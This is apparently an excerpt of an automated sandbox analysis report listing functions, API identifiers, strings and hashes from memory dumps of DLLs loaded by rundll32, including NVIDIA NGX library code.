                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Local$AddressAllocConditionFreeInfoMaskProcVerifyVersion
                                                                                                                                  • String ID: Advapi32.dll$CreateProcessAsUserW
                                                                                                                                  • API String ID: 1335820174-1007808920
                                                                                                                                  • Opcode ID: 9313167633e3093886861a610880a2977e5a3e8435188262efbfc91fb09343e7
                                                                                                                                  • Instruction ID: ea0947da0934eab410b0d069dd0c055f91f52ed9e63fd0eb6228be5dbe09e498
                                                                                                                                  • Opcode Fuzzy Hash: 9313167633e3093886861a610880a2977e5a3e8435188262efbfc91fb09343e7
                                                                                                                                  • Instruction Fuzzy Hash: 6331EF2570DB8185EA71CF56F4A026673A8FB88BC0F144135EE8D93B58DF3CD1108B00
                                                                                                                                  Function 00007FFD92DB4C90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: SetThreadStackGuarantee$SystemFunction036
                                                                                                                                  • API String ID: 2742660187-2910880125
                                                                                                                                  • Opcode ID: 42a21d8fbdf4c7fd55994a9aa03e55a39c0e69e3b1ff3945505324e5b554d08c
                                                                                                                                  • Instruction ID: 470734aea8243a446865cbc06989f2abf599218348930384a5dc1c3cb3bb4a82
                                                                                                                                  • Opcode Fuzzy Hash: 42a21d8fbdf4c7fd55994a9aa03e55a39c0e69e3b1ff3945505324e5b554d08c
                                                                                                                                  • Instruction Fuzzy Hash: AD01A211F4DA4281FA35AFD2E8612F45355EF18385F481632DA1D163AACE7CA5B9E700
                                                                                                                                  Function 00007FFD92DB7E80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: GetActiveWindow$GetLastActivePopup
                                                                                                                                  • API String ID: 2742660187-3742175580
                                                                                                                                  • Opcode ID: 30162a81ab991935d28d0d1c821ab97a2df501696bf24f83211b68c12433b53e
                                                                                                                                  • Instruction ID: 6b697480ecd2c9db4fdda8b67e8f0712c1ca4889313cf194cca3be132e4d8487
                                                                                                                                  • Opcode Fuzzy Hash: 30162a81ab991935d28d0d1c821ab97a2df501696bf24f83211b68c12433b53e
                                                                                                                                  • Instruction Fuzzy Hash: AFF03751F0A707D2FE39EFD2A8302B45259EF08351F880532CD0D262A1EF6CB585E351
                                                                                                                                  Function 00007FFD92DB9D50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                  • String ID: C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$NGXCreateDirectoryRecursively$failed to create directory %S - error %d
                                                                                                                                  • API String ID: 4241100979-1361627980
                                                                                                                                  • Opcode ID: 7c024f1bb6d74ec21c2d2f033cf2bf4cf5f2d7814f91e9676ac46fc94289f014
                                                                                                                                  • Instruction ID: 96f90d9cff8a47e1b26446403ee22be39ee74fd917ffb411cf7753402a695474
                                                                                                                                  • Opcode Fuzzy Hash: 7c024f1bb6d74ec21c2d2f033cf2bf4cf5f2d7814f91e9676ac46fc94289f014
                                                                                                                                  • Instruction Fuzzy Hash: 5CF06222F1C54283F7209FA8F86427AA3A4EB44785F544636DE5C87E55DE3CD4548740
                                                                                                                                  Function 00007FFD92DBD650 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BreakDebugMessage
                                                                                                                                  • String ID: %s (hr=0x%X)$Error
                                                                                                                                  • API String ID: 3531667747-1227332571
                                                                                                                                  • Opcode ID: 4cbfaf4f7e7d06033da862a7b53ddd587f6f84c2425c5882bd8af398c5c79dd9
                                                                                                                                  • Instruction ID: c59010bb86e0b1b681d1a5aafd31b0bf486e1438be936af84c64c4dd9d6a1d79
                                                                                                                                  • Opcode Fuzzy Hash: 4cbfaf4f7e7d06033da862a7b53ddd587f6f84c2425c5882bd8af398c5c79dd9
                                                                                                                                  • Instruction Fuzzy Hash: E6016D65B18A8282F770EBA1F8793BE2264FF98749F801136D98DA6645DE7CE1068600
                                                                                                                                  Function 0000000180010C38 Relevance: 6.3, APIs: 4, Instructions: 332stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: strcspn$Mpunctlocaleconv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882554788-0
                                                                                                                                  • Opcode ID: 58ecd130f00b09f8bef17f7d97753f2651f40aaaca60dedd1df9ae10203089cb
                                                                                                                                  • Instruction ID: 98907bd55804cf440550a9984b5626c23124420e0867e0600be7f70ad20b48f8
                                                                                                                                  • Opcode Fuzzy Hash: 58ecd130f00b09f8bef17f7d97753f2651f40aaaca60dedd1df9ae10203089cb
                                                                                                                                  • Instruction Fuzzy Hash: DFE18E32B04E8889EB529F65C4413ED63B1FB4CB88F658115EE8D57B99DF78C64AC340
                                                                                                                                  Function 0000000180008524 Relevance: 6.3, APIs: 4, Instructions: 302stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: strcspn$Mpunctlocaleconv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882554788-0
                                                                                                                                  • Opcode ID: fce10359bc36b8c483969d2f07a480db227c72c73635d2d78eb5f884875fabf2
                                                                                                                                  • Instruction ID: 7cedfd9f43536d940008849a18cc50f9a484f0cb7e860469d92b1f85863b93e9
                                                                                                                                  • Opcode Fuzzy Hash: fce10359bc36b8c483969d2f07a480db227c72c73635d2d78eb5f884875fabf2
                                                                                                                                  • Instruction Fuzzy Hash: 9DD15B32B05A8889EB52CBB5D4503DD37B1F749BC8F949115EE8967B8ADF38C24AC740
                                                                                                                                  Function 00007FFD92ED1A50 Relevance: 6.1, APIs: 4, Instructions: 72libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConditionFreeInfoLibraryLoadLocalMaskVerifyVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3996897175-0
                                                                                                                                  • Opcode ID: 7b90ea187a19757d781d7a8508d29235edc04a82aa32fe15ca570446b8cc600a
                                                                                                                                  • Instruction ID: a3bed71c603257707f03b0f933ade1d952538f1cb22d8842f58a53387640f911
                                                                                                                                  • Opcode Fuzzy Hash: 7b90ea187a19757d781d7a8508d29235edc04a82aa32fe15ca570446b8cc600a
                                                                                                                                  • Instruction Fuzzy Hash: ED21D832B08A8185FB74DF66B8642A52295BBC8BC1F054135DE4E9BB54DE3DD4028740
                                                                                                                                  Function 0000000180048310 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4151157258-0
                                                                                                                                  • Opcode ID: eb64e8c74a50022202f8ee626fe7dbe8f97126340f84a3ce38f6fe5f0cae3986
                                                                                                                                  • Instruction ID: 9616a423f97e3a452b980222ce2d2f9dcf0e870d32183e3c52a82e7da15984e5
                                                                                                                                  • Opcode Fuzzy Hash: eb64e8c74a50022202f8ee626fe7dbe8f97126340f84a3ce38f6fe5f0cae3986
                                                                                                                                  • Instruction Fuzzy Hash: D0213872204AAC40F7E75E1194D03FD66C0EB88FDAF1AC824FAC6076C5CD28C749A708
                                                                                                                                  Function 00007FFD92DC1B20 Relevance: 6.1, APIs: 4, Instructions: 61threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorFreeHandleLastLibraryThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3065451008-0
                                                                                                                                  • Opcode ID: 0d8131eb396a8f802abd1963439fb8b77639c9a0312576953a7fd75421bdef18
                                                                                                                                  • Instruction ID: 7a36634f77aeb09fc8b122d02dad349eca5bb797aedb53d21c6bfaa95b25f159
                                                                                                                                  • Opcode Fuzzy Hash: 0d8131eb396a8f802abd1963439fb8b77639c9a0312576953a7fd75421bdef18
                                                                                                                                  • Instruction Fuzzy Hash: 24218E25B0974286FE74DFE2A97407A6398BF84BC5F084631EB4D07B99DEBCE4088750
                                                                                                                                  Function 00000001800072C0 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddfacLocimp::_Locimp_LockitLockit::__lockfreemallocstd::_std::locale::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2732429687-0
                                                                                                                                  • Opcode ID: 4c7c4e4cdeb69145b53e9993b344bfcc5c5a1a68407a660adf776166b3026ff4
                                                                                                                                  • Instruction ID: 76cda7fa5ebd9028eb80fcaf77cbf10d53a700b3cb3c5ee5f831434e332e8d90
                                                                                                                                  • Opcode Fuzzy Hash: 4c7c4e4cdeb69145b53e9993b344bfcc5c5a1a68407a660adf776166b3026ff4
                                                                                                                                  • Instruction Fuzzy Hash: 84213B71604A8881EBA2CF11E4403DAB3A0F7597E0F548216EB9D57BA6CF7CC6998740
                                                                                                                                  Function 00007FFD92DB1190 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
